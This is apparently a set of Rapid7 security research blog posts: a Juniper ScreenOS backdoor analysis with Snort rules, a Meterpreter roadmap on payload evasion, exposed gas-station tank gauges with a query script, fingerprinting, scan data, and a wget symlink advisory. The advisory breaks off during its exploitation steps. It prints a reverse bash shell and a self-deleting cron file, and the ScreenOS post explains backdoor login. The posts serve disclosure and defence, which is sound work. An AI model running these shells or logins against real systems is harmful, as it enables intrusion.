Rapid7 Blog

HD Moore  


Six Wonderful Years


Rapid7 has been my home for the last six years, growing from 98 people when I joined to over 700 today. Keeping up with the growth has been both exhilarating and terrifying. I am really proud of our Austin team, the Metasploit ecosystem, and our leadership in security research. We care about our customers, our employees, and our impact in the industry. Working at Rapid7 has simply been the best job I have ever had.

We have surpassed every goal that I set when I joined in 2009. Metasploit is thriving. Our research continues to shine light on exposures both wide and deep. Rapid7 is recognized as a champion of open source development. Rapid7 is a solid brand name in both enterprise security and the security community. We have helped shape vulnerability disclosure and the politics of security research. We scan the internet, legally, and share the data with the world. We help our customers improve their security while continuing to support the security community.

Late last year, a friend of mine offered me an inspiring opportunity. After some reflection, I realized that the role he described was a natural evolution of my career in this industry. I will be leaving Rapid7 to help build a new venture capital firm focused on helping early-stage security companies get to market faster. Since the only thing more insane than working at one startup is working with multiple startups at the same time, this seemed like a perfect match and a way to contribute back to the security community.

Although my last day at Rapid7 is January 29th, I will not be going far. I will continue to work on the Metasploit Framework and stay active in the community. I have full faith that the Metasploit team will continue to build great things and put our users first. Similarly, Rapid7 continues to increase its investment in security research and will still share findings to benefit the security community as a whole and help people protect themselves.

Rapid7 has a unique position in the industry and an amazing team. I have no doubt that the company's best days are ahead. Although I won't be with the company, I will be cheering from the sidelines.

-HD

CVE-2015-7755: Juniper ScreenOS Authentication Backdoor


On December 18th, 2015, Juniper issued an advisory indicating that they had discovered unauthorized code in the ScreenOS software that powers their Netscreen firewalls. This advisory covered two distinct issues: a backdoor in the VPN implementation that allows a passive eavesdropper to decrypt traffic, and a second backdoor that allows an attacker to bypass authentication in the SSH and Telnet daemons. Shortly after Juniper posted the advisory, an employee of Fox-IT stated that they were able to identify the backdoor password in six hours. A quick Shodan search identified approximately 26,000 internet-facing Netscreen devices with SSH open. Given the severity of this issue, we decided to investigate.

Juniper's advisory mentioned that versions 6.2.0r15 to 6.2.0r18 and 6.3.0r12 to 6.3.0r20 were affected. Juniper provided a new 6.2.0 and 6.3.0 build, but also rebuilt older packages that omit the backdoor code. The rebuilt older packages have a "b" suffix on the version and have a minimal set of changes, making them the best candidate for analysis.

In order to analyze the firmware, it must be unpacked and then decompressed. The firmware is distributed as a ZIP file that contains a single binary. This binary is a decompression stub followed by a gzip-compressed kernel. The x86 images can be extracted easily with binwalk, but the XScale images require a bit more work. ScreenOS is not based on Linux or BSD, but runs as a single monolithic kernel. The SSG500 firmware uses the x86 architecture, while the SSG5 and SSG20 firmware uses the XScale (ARMB) architecture. The decompressed kernel can be loaded into IDA Pro for analysis. As part of the analysis effort, we have made decompressed binaries available in a GitHub repository.

Although most folks are more familiar with x86 than ARM, the ARM binaries are significantly easier to compare due to minimal changes in the compiler output. In order to load the SSG5 (ssg5ssg20.6.3.0r19.0.bin) firmware into IDA, the ARMB CPU should be selected, with a load address of 0x80000 and a file offset of 0x20. Once the binary is loaded, it helps to identify and tag common functions. Searching for the text "strcmp" finds a static string that is referenced in the sub_ED7D94 function. Looking at the strings output, we can see some interesting string references, including auth_admin_ssh_special and auth_admin_internal. Searching for auth_admin_internal finds the sub_13DBEC function. This function has a strcmp call that is not present in the 6.3.0r19b firmware. The argument to the strcmp call is <<< %s(un='%s') = %u, which is the backdoor password, and was presumably chosen so that it would be mistaken for one of the many other debug format strings in the code.

This password allows an attacker to bypass authentication through SSH and Telnet. If you want to test this issue by hand, telnet or ssh to a Netscreen device, specify any username, and use the backdoor password. If the device is vulnerable, you should receive an interactive shell with the highest privileges.

The interesting thing about this backdoor is not the simplicity, but the timing. Juniper's advisory claimed that versions 6.2.0r15 to 6.2.0r18 and 6.3.0r12 to 6.3.0r20 were affected, but the authentication backdoor is not actually present in older versions of ScreenOS. We were unable to identify this backdoor in versions 6.2.0r15, 6.2.0r16, or 6.2.0r18, and it is probably safe to say that the entire 6.2.0 series was not affected by this issue (although the VPN issue was present).
We were also unable to identify the authentication backdoor in versions 6.3.0r12 or 6.3.0r14. We could confirm that versions 6.3.0r17 and 6.3.0r19 were affected, but were not able to track down 6.3.0r15 or 6.3.0r16. This is interesting because although the first affected version was released in 2012, the authentication backdoor did not seem to get added until a release in late 2013 (either 6.3.0r15, 6.3.0r16, or 6.3.0r17).

Detecting the exploitation of this issue is non-trivial, but there are a couple of things you can do. Juniper provided guidance on what the logs from a successful intrusion would look like:

2015-12-17 09:00:00 system warn 00515 Admin user system has logged on via SSH from …..
2015-12-17 09:00:00 system warn 00528 SSH: Password authentication successful for admin user ‘username2’ at host …

Although an attacker could delete the logs once they gain access, any logs sent to a centralized logging server (or SIEM) would be captured, and could be used to trigger an alert.

Fox-IT has created a set of Snort rules that can detect access with the backdoor password over Telnet and flag any internet-reachable ScreenOS SSH service:

# Signatures to detect successful abuse of the Juniper backdoor password over telnet.
# Additionally a signature for detecting world reachable ScreenOS devices over SSH.
alert tcp $HOME_NET 23 -> any any (msg:"FOX-SRT - Flowbit - Juniper ScreenOS telnet (noalert)"; flow:established,to_client; content:"Remote Management Console|0d0a|"; offset:0; depth:27; flowbits:set,fox.juniper.screenos; flowbits:noalert; reference:cve,2015-7755; reference:url,http://kb.juniper.net/JSA10713; classtype:policy-violation; sid:21001729; rev:2;)
alert tcp any any -> $HOME_NET 23 (msg:"FOX-SRT - Backdoor - Juniper ScreenOS telnet backdoor password attempt"; flow:established,to_server; flowbits:isset,fox.juniper.screenos; flowbits:set,fox.juniper.screenos.password; content:"|3c3c3c20257328756e3d2725732729203d202575|"; offset:0; fast_pattern; classtype:attempted-admin; reference:cve,2015-7755; reference:url,http://kb.juniper.net/JSA10713; sid:21001730; rev:2;)
alert tcp $HOME_NET 23 -> any any (msg:"FOX-SRT - Backdoor - Juniper ScreenOS successful logon"; flow:established,to_client; flowbits:isset,fox.juniper.screenos.password; content:"-> "; isdataat:!1,relative; reference:cve,2015-7755; reference:url,http://kb.juniper.net/JSA10713; classtype:successful-admin; sid:21001731; rev:1;)
alert tcp $HOME_NET 22 -> $EXTERNAL_NET any (msg:"FOX-SRT - Policy - Juniper ScreenOS SSH world reachable"; flow:to_client,established; content:"SSH-2.0-NetScreen"; offset:0; depth:17; reference:cve,2015-7755; reference:url,http://kb.juniper.net/JSA10713; classtype:policy-violation; priority:1; sid:21001728; rev:1;)

Robert Nunley has created a set of Sagan rules for this issue:

sagan-rules/juniper.rules
sagan-rules/juniper-geoip.rules

If you are trying to update a ScreenOS system and are running into issues with the signing key, take a look at Steve Puluka's blog post.

We would like to thank Ralf-Philipp Weinmann of Comsecuris for his help with unpacking and analyzing the firmware and Maarten Boone of Fox-IT for confirming our findings and providing the Snort rules above.

Update: Fox-IT reached out and confirmed that any username can be used via Telnet or SSH with the backdoor password, regardless of whether it is valid or not.
Update: Juniper has confirmed that the authentication backdoor only applies to revisions 6.3.0r17, 6.3.0r18, 6.3.0r19, and 6.3.0r20.

Update: Details on CVE-2015-7756 have emerged. The Wired article provides a great overview as well.

-HD
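The last Fox-IT signature above simply keys on the "SSH-2.0-NetScreen" banner to spot internet-reachable ScreenOS SSH services. As a rough, stand-alone illustration of that same check outside of Snort, here is a minimal Python sketch; the placeholder host, timeout, and banner handling are assumptions for the example and not part of the original post, and it should only be pointed at systems you are authorized to test:

import socket

def screenos_ssh_banner(host, port=22, timeout=5):
    """Grab the SSH banner from a host and report whether it looks like ScreenOS."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.settimeout(timeout)
        banner = sock.recv(256).decode("ascii", errors="replace").strip()
    # The Fox-IT policy rule matches on this banner prefix.
    return banner, banner.startswith("SSH-2.0-NetScreen")

if __name__ == "__main__":
    for target in ["192.0.2.10"]:  # placeholder; replace with authorized targets
        try:
            banner, is_screenos = screenos_ssh_banner(target)
            print(f"{target}: {banner!r} (ScreenOS: {is_screenos})")
        except OSError as exc:
            print(f"{target}: connection failed ({exc})")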

Meterpreter Survey 2015: You spoke, we listened, then wrote a bunch of code.


The Survey

One month ago we asked the community for feedback about how they use Metasploit and what they want to see in the Meterpreter payload suite going forward. Over the course of a week we received over 400 responses and over 200 write-in suggestions for new features. We have spent the last month parsing through your responses, identifying dependencies, and actively delivering new features based on your requests. These requests covered 20 different categories: General Feedback, Metasploit Framework Features, Metasploit RPC API Feedback, The Antivirus Ate My Payload, Meterpreter Platform Support, Mimikatz Integration, Meterpreter Pivoting, Privilege Escalation, Remote File Access, Meterpreter Features, Meterpreter Stager Support, Meterpreter Transport Flexibility, Meterpreter HTTP Transport Options, Meterpreter Proxy Support, Communication Protection, Communications Evasion, Session Handlers, Session Reliability, Android Meterpreter Features, and Payload Generation.

We merged similar requests, removed duplicate items, and reworded many of the suggestions so far. For the issues specific to Meterpreter, you can now find them listed on the Meterpreter Wishlist. If you don't see your feedback listed, it was either merged into another item, or wasn't Meterpreter specific (Metasploit features, AV feedback, RPC API feedback, etc). After parsing through these, we grouped up similar items, figured out the missing dependencies, started building out a rough plan for 2015, and got down to business.

Over the last two weeks we have made some serious progress, mostly focused on the work that has to be done before we can tackle the bigger features on this list. The wishlist items marked [DONE] were the result of this first sprint, while the rest of the items listed as [IN PROGRESS] are being actively worked on by either myself, OJ Reeves, or Brent Cook. While there is no realistic chance that we can get to every feature that was submitted, we are going to try to build out enough supporting functionality that the community can tackle the wider group of features with minimum pain. If something jumps out that you want to work on, please join the IRC channel and see if there are any blocking issues before diving in. Once you have a green light, send us a pull request once you are ready for feedback. If you can't contribute, no worries; keep reading for what is done so far, and where we are headed.

Attacks Have Changed

The Metasploit Project started in 2003 with a broad goal of sharing information about exploit techniques and making the development of new security tools much easier. This was a time when shellcode golf was the name of the game, SEH overwrites had hackers yelling "POP, POP, RET!", and databases of opcodes at static addresses made exploit development possible for systems you didn't even have. Fast-forward a decade, and exploit mitigations at the OS level have made traditional exploit methods obsolete and complicated reliable remote exploitation, at least for memory corruption vulnerabilities. At the same time, anti-virus tools, anti-malware network gateways, and SSL-inspecting web proxies have become a thorn in the side of many professional penetration testers. Neither this shift away from memory corruption vulnerabilities nor the availability of new security technologies has decreased the number of compromises, but the way networks get compromised has changed.
As operating system and compiler vendors made memory corruption vulnerabilities more complicated to exploit on end-user and server platforms, attackers have shifted to the weakest links, which are typically the actual employees, their devices, and their passwords. Metasploit has continued to evolve to support these use cases, with a focus on client-side applications, web applications, embedded devices, and attacking the credentials themselves. The one area where Metasploit hasn't changed, however, has been payloads. For the better part of 12 years, Metasploit payloads and encoders have had one primary goal: fit inside the exploits. This works great when Metasploit users are getting shells through memory corruption flaws, but doesn't make a lot of sense when attacks can deliver a multi-megabyte executable or JAR file onto the target. As a result, Metasploit payloads have been artificially constrained in terms of functionality and error handling.

That has now changed. Payloads and encoders can now opt in to new features, better error handling, and network-level evasion when they have the room for it. This is now enabled by default when using msfvenom (specify -s to tell the payload how much space it can use).

Separate, but related, was the slow startup time of the Metasploit Console (msfconsole). A few months ago, many users had to wait up to 30 seconds to use msfconsole on a modern system. After the switch to Ruby 2.1.5, this dropped to under 10 seconds for most users. Most recently, payloads now cache their static size, allowing us to use Metasm to generate and compile assembly on the fly, and knocking quite a bit of processing out of the startup time. Running the latest version of msfconsole on an SSD-enabled system with Ruby 2.1.5 can result in startup times between 1 and 5 seconds.

These two changes pave the way to solving the number one piece of feedback: payload size doesn't matter that much anymore. Many people use Metasploit payloads without exploits, either by delivering the payloads manually, or combining them with third-party tools like SET, and these payloads should support advanced options and handle network errors gracefully. Metasploit payloads now selectively enable functionality based on your use case and the available space.

Sprint 1 Features

The features below were some of the first dependencies needed to really tackle the features requested in the survey. These are available in the Metasploit Framework master branch today and will be going out to Metasploit Pro, Metasploit Express, Metasploit Community, and Kali Linux users this week.

HTTP Stagers

The reverse_http and reverse_https stagers have been around for a few years and they solve a number of problems related to session egress within corporate networks, but they were starting to get dusty. First of all, we continued to add new versions of these payloads to handle specific use cases, like proxies, proxy authentication, and hopping through intermediate web services. We are now actively working on a complete refactor that merges all of this functionality into a smaller set of smarter payloads. In addition to bug fixes, better error handling, and size-aware feature selection, these payloads have been expanded with some new functionality:

Long URIs: The reverse_http and reverse_https stagers now use much longer URIs by default. The old default was to use a 5-byte URI, but these were starting to get blocked by a number of web proxies. The new default is to use a random URI between 30 and 255 bytes.
WinHTTP: Borja Merino submitted a really nice set of reverse_winhttp and reverse_winhttps stagers. These stagers switch to the WinHTTP API (from WinInet), which helps bypass certain anti-malware implementations, and build the base for a number of new features. The development started off as Borja's PR and eventually got rolled into the new Metasm base payload.

SSL Validation: SSL certificate verification is now available in the reverse_winhttps stager. You can enable this by generating a payload with the HandlerSSLCert option set to the file name of an SSL certificate (PEM format) and setting the StagerVerifySSLCert option to true. The Metasploit exploit or exploit/multi/handler listener should set these options to the same value. Once these are set, the stager will verify that the SSL certificate presented by the Metasploit listener matches the SHA-1 hash of the HandlerSSLCert certificate and will exit if they don't match. This is a great way to make sure that an SSL-inspecting proxy isn't monkeying with your session, and it provides stager-level authentication that is resistant to man-in-the-middle attacks, even if the target system has a malicious CA root certificate installed. If you want to make this apply to all future uses of reverse_winhttp, use the setg command in msfconsole to configure HandlerSSLCert and StagerVerifySSLCert, then save to make these the default. We still have a lot more work to do on HTTP stagers, so keep an eye on ticket #4895 if you want to keep up on the latest changes.

Meterpreter SSL Verification

Updating the WinHTTP stagers to support SSL verification is only part of the puzzle. OJ Reeves also delivered SSL certificate validation in the Windows Meterpreter payloads. These can be enabled using the same HandlerSSLCert and StagerVerifySSLCert options as the stagers. If you set these within an exploit, the entire process is automatic, but if you are using exploit/multi/handler, be sure to set them both in the msfvenom generation (stageless or otherwise) as well as the listener. Note that verification occurs after the HTTP request has been sent. As a result, you will get a "dead" session when the Meterpreter is enforcing this setting and doesn't see the right SSL certificate. We are looking into better solutions for this going forward. A small sketch of the underlying certificate-pinning idea appears at the end of this post.

Meterpreter "Stageless" Payloads

One often-requested feature was the ability to run Meterpreter without the shellcode stager. A project called Inmet (ultmet.exe) is best known for providing a stageless metsrv in the past, but this implementation wasn't as smooth as it should have been due to incompatibilities in the framework. Over the last two weeks, OJ Reeves has delivered an impressive approach to stageless Meterpreters and I strongly recommend that you check out his post on the topic. This is the first step to implementing many of the advanced features requested in the survey.

Meterpreter Unicode (최고)

Nearly all Meterpreter payloads will support Unicode file and directory names, converting between UTF-8 and native string implementations as needed. If you used Metasploit outside of the US in the past, you may be familiar with the EnableUnicodeEncoding option in Meterpreter. Previously, this was set to true by default, and would translate garbled Unicode names into identifiers that looked like $U$-0xsomething. This made it possible to work with non-native encodings, but it wasn't much fun. Fortunately, so long as your Linux terminal supports UTF-8, this is no longer necessary.
Windows users still need the EnableUnicodeEncoding crutch since Console2 doesn't implicitly support Unicode, but everyone else should be good to go for full Unicode support going forward. Unicode is still a work in progress, but it is nearly complete across all Meterpreter payloads: the Python and Windows Meterpreters have full Unicode support for file system operations; the PHP Meterpreter has support only on non-Windows platforms due to API limitations; and the Java and Android Meterpreters have a pending pull request adding support for Windows and non-Windows platforms. Note that Unicode is not automatically translated for shell sessions (or shell channels in Meterpreter). This is a bit more complicated, but is on our radar for long-term support.

Meterpreter MS-DOS "short" Names

Meterpreter now displays MS-DOS 8.3 "short" names when you use the ls command with the -x parameter on Windows. This makes it easy to copy, rename, and generally manipulate a file or directory with an unwieldy name. A quick and easy win, and really useful in a pinch.

Next Steps: April 2015

Our plans for the next month are centered around improving the Meterpreter code organization and build process, supporting unique embedded payload IDs (a precursor for universal listeners), improving the reliability and resilience of all Meterpreter transports, adding support for live transport switching to Meterpreter, and improving the usability of all of these features as we go. There is a ton of work to do, but these efforts will lay the groundwork for approaching the rest of the wishlist going forward. One of our goals is to maintain complete backwards compatibility with both old Metasploit installations and their associated payloads. More often than not this means taking two steps forward and one back as we make small incremental changes in quick succession. In addition to the fun part (the code), we will be updating the test suites and documentation as we go as well.

May 2015 and Beyond

We are looking at May as the time when we can start seriously considering BIG features. These may include remote scripting engines, enhanced pivoting, pluggable transports, and a deep dive into mobile device support. Figuring out what is going to fit and how to prioritize it is going to be driven by engineering challenges as much as community feedback and contributions. As attacks change, so will Metasploit, and the time has come for payloads to take the next big step. Onward, through the pull requests!

-HD
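As referenced in the SSL Validation section above, the stager and Meterpreter compare the SHA-1 hash of the certificate configured in HandlerSSLCert with the certificate presented by the listener. The following Python sketch illustrates that pinning idea outside of Metasploit. Whether the payloads hash the DER or PEM encoding is an implementation detail not covered in the post, so the DER choice and the file name and host below are assumptions for illustration only:

import hashlib
import ssl

def sha1_of_pem_cert(pem_path):
    """SHA-1 fingerprint of a local PEM certificate (e.g. the HandlerSSLCert file)."""
    with open(pem_path) as f:
        der = ssl.PEM_cert_to_DER_cert(f.read())
    return hashlib.sha1(der).hexdigest()

def sha1_of_remote_cert(host, port):
    """SHA-1 fingerprint of the certificate presented by a remote listener."""
    pem = ssl.get_server_certificate((host, port))
    return hashlib.sha1(ssl.PEM_cert_to_DER_cert(pem)).hexdigest()

if __name__ == "__main__":
    # Hypothetical paths/hosts for illustration only.
    expected = sha1_of_pem_cert("handler.pem")
    presented = sha1_of_remote_cert("192.0.2.5", 8443)
    print("pin matches" if expected == presented else "pin mismatch - do not proceed")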

The Internet of Gas Station Tank Gauges


Introduction

Automated tank gauges (ATGs) are used to monitor fuel tank inventory levels, track deliveries, raise alarms that indicate problems with the tank or gauge (such as a fuel spill), and to perform leak tests required by environmental regulations. ATGs are used by nearly every fueling station in the United States and by tens of thousands of stations internationally. Many ATGs can be programmed and monitored through a built-in serial port, a plug-in serial port, a fax/modem, or a TCP/IP circuit board. In order to monitor these systems remotely, many operators use a TCP/IP card or a third-party serial port server to map the ATG serial interface to an internet-facing TCP port. The most common configuration is to map these to TCP port 10001. Although some systems have the capability to password protect the serial interfaces, this is not commonly implemented.

Approximately 5,800 ATGs were found to be exposed to the internet without a password. Over 5,300 of these ATGs are located in the United States, which works out to about 3 percent of the approximately 150,000 [1] fueling stations in the country. An attacker with access to the serial port interface of an ATG may be able to shut down the station by spoofing the reported fuel level, generating false alarms, and locking the monitoring service out of the system. Tank gauge malfunctions are considered a serious issue due to the regulatory and safety issues that may apply.

Who is affected?

An internet-wide scan on January 10th, 2015 [3] identified approximately 5,800 ATGs with TCP port 10001 exposed to the internet and no password set. The majority of these systems belong to retail gas stations, truck stops, and convenience stores. A number of major brands and franchises were represented in the dataset. An unknown number of ATGs are exposed through modem access. The majority of the ATGs appear to be manufactured by Veeder-Root, one of the largest vendors in this space, and were identified on IP ranges associated with consumer broadband services. The graphs below indicate the top 10 states with exposed ATGs, followed by a breakdown of ATGs by ISP.

How serious is this?

ATGs are designed to detect leaks and other problems with fuel tanks. In our opinion, remote access to the control port of an ATG could provide an attacker with the ability to reconfigure alarm thresholds, reset the system, and otherwise disrupt the operation of the fuel tank. An attacker may be able to prevent the use of the fuel tank entirely by changing access settings and simulating false conditions, triggering a manual shutdown. Theoretically, an attacker could shut down over 5,300 fueling stations in the United States with little effort.

How was the issue discovered?

Jack Chadowitz, founder of Kachoolie, a BostonBase Inc. spin-off, reached out to Rapid7 on January 9th, 2015 [3] after reading about Rapid7's previous research into publicly exposed serial port servers. Mr. Chadowitz became aware of the ATG vulnerabilities through his work in the industry and developed a web-based portal to test the exposure, as well as a secure alternative solution. Mr. Chadowitz asked Rapid7 for assistance investigating the issue at a global level. On January 10th, Rapid7 conducted an internet-wide scan for ATGs with TCP port 10001 exposed to the internet. Rapid7 sent a Get In-Tank Inventory Report request (I20100) to every IPv4 address [2] that had TCP port 10001 open.
The response to this request included the station name, address, number of tanks, tank levels, and fuel types.

Is this being exploited in the wild? How exploitable is it?

To the best of our knowledge this issue is not being exploited in the wild. However, it would be difficult to tell the difference between an intentional attack and a system failure. Public documentation from Veeder-Root provides detailed instructions on how to manipulate ATGs using the serial interface, which also applies to the TCP/IP interface on port 10001. No special tools are necessary to interact with exposed ATGs; a rough sketch of an I20100 inventory query appears after the footnotes below.

What can be done to mitigate or remediate?

Operators should consider using a VPN gateway or other dedicated hardware interface to connect their ATGs with their monitoring service. Less-secure alternatives include applying source IP address filters or setting a password on each serial port.

Footnotes

1. The 2012 US Census counted 112,000 gas stations; however, the 2015 number has been estimated by an industry expert to be closer to 150,000 (including private facilities).
2. Rapid7 used the existing Project Sonar infrastructure to conduct the ATG scan. This system skips networks where the owners have explicitly requested that their systems be excluded from future scans. At the time of the ATG scan, approximately 6.5 million addresses were excluded from the routable IPv4 address space.
3. An earlier version of this post incorrectly stated the dates as 2014, not 2015.
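For illustration, here is a minimal Python sketch of the kind of Get In-Tank Inventory Report (I20100) query described above. The SOH (0x01) prefix and trailing newline follow the common Veeder-Root TLS-350 serial convention, and the target host is a placeholder; treat the exact framing as an assumption rather than a specification, and only probe systems you are authorized to test:

import socket

def get_inventory_report(host, port=10001, timeout=10):
    """Send an I20100 (in-tank inventory) query to an ATG serial-over-TCP port."""
    query = b"\x01I20100\n"  # SOH + function code; assumed TLS-350 style framing
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.settimeout(timeout)
        sock.sendall(query)
        chunks = []
        while True:
            try:
                data = sock.recv(4096)
            except socket.timeout:
                break
            if not data:
                break
            chunks.append(data)
            if b"\x03" in data:  # ETX marks the end of a TLS-350 response
                break
    return b"".join(chunks).decode("ascii", errors="replace")

if __name__ == "__main__":
    print(get_inventory_report("192.0.2.20"))  # placeholder address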

12 Days of HaXmas: Metasploit, Nexpose, Sonar, and Recog


This post is the tenth in a series, 12 Days of HaXmas, where we take a look at some of the more notable advancements and events in the Metasploit Framework over the course of 2014.

The Metasploit Framework uses operating system and service fingerprints for automatic target selection and asset identification. This blog post describes a major overhaul of the fingerprinting backend within Metasploit and how you can extend it by submitting new fingerprints.

Historically, Metasploit wasn't great at fingerprinting. Shortly after the Rapid7 acquisition, we added an internal fingerprinting system to the framework, but we still depended on imports from Nexpose, Nmap, and other external tools to obtain comprehensive results. The only areas where fingerprint coverage was passable were the SMB, HTTP, and web browser rules, since many modules depended on these for automatic configuration. Metasploit has the ability to import data from dozens of external sources, including web application scanners, vulnerability scanners, and even raw PCAP files. Normalizing all of this data was a challenge, and the fingerprinting backend had the job of squashing conflicting OS and service names into something that modules could easily understand.

By mid-2013, Metasploit's fingerprints were getting stale and the ruleset was becoming more tangled than ever. Changing one fingerprint required carefully reviewing all of the code paths where a conflicting rule might override the resulting value. New operating systems and services were released and the backend simply wasn't keeping up. For our Metasploit Pro customers, this was less of an issue due to the direct integration with Nexpose and Nmap, but we needed a fresh approach all the same.

Earlier in 2013, my team was looking at whether we could improve our products using existing internet-wide scan data. Our first project involved an overhaul of the Nexpose SNMP fingerprints by leveraging the Critical.IO dataset. Nexpose fingerprints are stored as a series of regular expressions within XML files. These fingerprints were easy to read, write, and test. Over the course of a week we were able to expand Nexpose's SNMP system description fingerprints to cover approximately 85% of the devices found on the internet by the Critical.IO SNMP scan. This was a quick win and made it clear that we should be looking at internet scan data as a primary source of new fingerprints.

In 2014, we took the same approach using the Project Sonar data to add fingerprints for popular HTTP services. Our approach was to sort the raw scan data by frequency, determine which fingerprints would cover the largest number of systems, and then sit down and write those fingerprints. This work improved fingerprint accuracy for our Nexpose customers and provided an opportunity to do targeted vulnerability research on the most widely exposed devices and services. The issues with the Metasploit fingerprints remained, but a plan was starting to come together.

First, we had to get sign-off to open source the Nexpose fingerprint database. Next, we had to write some wrapper code that made interfacing with and testing these fingerprints quick and painless. Finally, we had to rip out the existing Metasploit fingerprinting engine, normalize the entire framework to use the new fingerprints, and add some glue code to map Nexpose conventions to what Metasploit expected.
This required a major effort across the Nexpose, Metasploit, and Labs teams and took the better part of five months to finally deliver.

The result was Recog, an open source recognition framework. Recog is now the upstream for both Nexpose and Metasploit fingerprints. We will continue to leverage Project Sonar to add and improve fingerprints, but even better, our customers and open source users can now submit new fingerprints of their own. Recog is available under a BSD 2-Clause license and can be used within your own projects, open source or otherwise, and although the test framework is written in Ruby, the XML fingerprints are easy to process in just about every language. A simplified sketch of how these regular-expression fingerprints are applied to a banner is shown at the end of this post.

Metasploit users benefit through consistent formatting of third-party data imports, better fingerprinting when using scanner modules, and support for targeting newer operating systems and web browsers. Nexpose users will continue to see improvements to fingerprinting, with several major leaps in coverage as Project Sonar progresses. Metasploit contributors can take advantage of the new fingerprint.match note type to provide fingerprint suggestions to the new matching engine. If you are interested in the mechanics of how Metasploit interfaces with Recog, take a look at the OS normalization code in MDM.

Recog is a great example of Rapid7's commitment to open source and our desire to collaborate with the greater information security community. Although writing fingerprints isn't the most exciting task, accurate fingerprints are a requirement for reliable vulnerability assessments and successful penetration tests. If you are looking for a chance to contribute to Metasploit, or simply want better fingerprinting for systems within your own network, please consider submitting updates to Recog. Feel free to drop by the #metasploit channel on the Freenode IRC network if you would like to chat with the development team. If you have a new fingerprint but don't feel comfortable sending a pull request, feel free to file an Issue within the Recog repository on GitHub instead.

-HD
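As referenced above, the core idea behind Recog-style fingerprints is a list of regular expressions with named captures that map a raw banner to normalized attributes. The sketch below is a simplified Python illustration of that matching model; the example patterns and attribute names are hypothetical and do not reproduce the actual Recog XML schema or fingerprint database:

import re

# Hypothetical fingerprints: each pairs a compiled pattern with static attributes.
# Real Recog fingerprints live in XML files and include parameters and test examples.
FINGERPRINTS = [
    {
        "pattern": re.compile(r"^Apache/(?P<version>[\d.]+)"),
        "attrs": {"service.vendor": "Apache", "service.product": "HTTPD"},
    },
    {
        "pattern": re.compile(r"^Microsoft-IIS/(?P<version>[\d.]+)"),
        "attrs": {"service.vendor": "Microsoft", "service.product": "IIS"},
    },
]

def match_banner(banner):
    """Return normalized attributes for the first fingerprint that matches the banner."""
    for fp in FINGERPRINTS:
        m = fp["pattern"].match(banner)
        if m:
            result = dict(fp["attrs"])
            result.update(m.groupdict())  # fold in captured fields such as version
            return result
    return None

if __name__ == "__main__":
    print(match_banner("Apache/2.4.10 (Debian)"))
    print(match_banner("Microsoft-IIS/7.5"))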

2015: Project Sonar Wiki & UDP Scan Data


Project Sonar started in September of 2013 with the goal of improving security through the active analysis of public networks. For the first few months, we focused almost entirely on SSL, DNS, and HTTP enumeration. This uncovered all sorts of interesting security issues and contributed to a number of advisories and research papers. The SSL and DNS datasets were especially good at identifying assets for a given organization, often finding systems that the IT team had no inkling of. At this point, we had a decent amount of automation in place, and decided to start the next phase of Project Sonar: scanning UDP services.

While we received a few opt-out requests for HTTP scans in the past, these were completely eclipsed by the number of folks requesting to be excluded after our UDP probes generated an alert on their IDS or firewall. Handling opt-out requests became a part-time job that was rotated across the Labs team. We tried and often succeeded at rolling out exclusions within a few minutes of receiving a request, but it came at the cost of getting other work done. At the end of the day, the value of the data, and our ability to improve public security, depended on having consistent scan data across a range of services. As of mid-December, the number of opt-out requests has leveled off, and we had a chance to start digging into the results.

There was some good news for a change:

VxWorks systems with an internet-exposed debug service have dropped from a peak of ~300,000 in 2010 to around ~61,000 in late 2014.
Servers with the IPMI protocol exposed to the internet have dropped from ~250,000 in June to ~214,000 in December 2014.
NTP daemons with monlist enabled have decreased somewhere between 25-50% (our data doesn't quite agree with ShadowServer's).

The bad news is that most of the other stats stayed relatively constant across six months:

Approximately 200,000 Microsoft SQL Servers are still responding to UDP pings, and many of these are end-of-life versions.
Over 15,000,000 devices expose SIP to the internet, and about half of these are from a single vendor in a single region.

One odd trend was a consistent increase in the number of systems exposing NATPMP to the internet. This number has increased from just over 1 million in June to 1.3 million in December. Given that NATPMP is never supposed to be internet facing, this points to even more exposure in 2015.

We conducted over 330 internet-wide UDP scans in 2014, covering 13 different UDP probes, and generating over 96 gigabytes of compressed scan data. All of this data is now immediately available along with a brand new wiki that documents what we scan and how to use the published data.

2015 is looking like a great year for security research!

-HD

R7-2014-15: GNU Wget FTP Symlink Arbitrary Filesystem Access


Introduction

GNU Wget is a command-line utility designed to download files via HTTP, HTTPS, and FTP. Wget versions prior to 1.16 are vulnerable to a symlink attack (CVE-2014-4877) when running in recursive mode with an FTP target. This vulnerability allows an attacker operating a malicious FTP server to create arbitrary files, directories, and symlinks on the user's filesystem. The symlink attack allows file contents to be overwritten, including binary files, and provides access to the entire filesystem with the permissions of the user running wget. This flaw can lead to remote code execution through system-level vectors such as cron and user-level vectors such as bash profile files and SSH authorized_keys.

Vulnerability

The flaw is triggered when wget receives a directory listing that includes a symlink followed by a directory with the same name. The output of the LIST command would look like the following, which is not possible on a real FTP server:

lrwxrwxrwx 1 root root 33 Oct 28 2014 TARGET -> /
drwxrwxr-x 15 root root 4096 Oct 28 2014 TARGET

Wget would first create a local symlink named TARGET that points to the root filesystem. It would then enter the TARGET directory and mirror its contents across the user's filesystem.

Remediation

Upgrade to wget version 1.16 or a package that has backported the CVE-2014-4877 patch. If you use a distribution that does not ship a patched version of wget, you can mitigate the issue by adding the line retr-symlinks=on to either /etc/wgetrc or ~/.wgetrc. This issue is only exploitable when running wget in recursive mode against an FTP server URL. Although an HTTP service can redirect wget to an FTP URL, wget implicitly disables the recursive option after following this redirect, so it is not exploitable in this scenario.

Exploitation

We have released a Metasploit module to demonstrate this issue. In the example below, we demonstrate obtaining a reverse command shell against a user running wget as root against a malicious FTP service. This example makes use of the cron daemon and a reverse-connect bash shell. First we will create a reverse connect command string using msfpayload.

# msfpayload cmd/unix/reverse_bash LHOST=192.168.0.4 LPORT=4444 R
0<&112-;exec 112<>/dev/tcp/192.168.0.4/4444;sh <&112 >&112 2>&112

Next we create a crontab file that runs once a minute, launches this command, and deletes itself:

# cat>cronshell <<EOD
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
* * * * * root bash -c '0<&112-;exec 112<>/dev/tcp/192.168.0.4/4444;sh <&112 >&112 2>&112'; rm -f /etc/cron.d/cronshell
EOD

Now we start up msfconsole and configure a shell listener:

# msfconsole
msf> use exploit/multi/handler
msf exploit(handler) > set PAYLOAD cmd/unix/reverse_bash
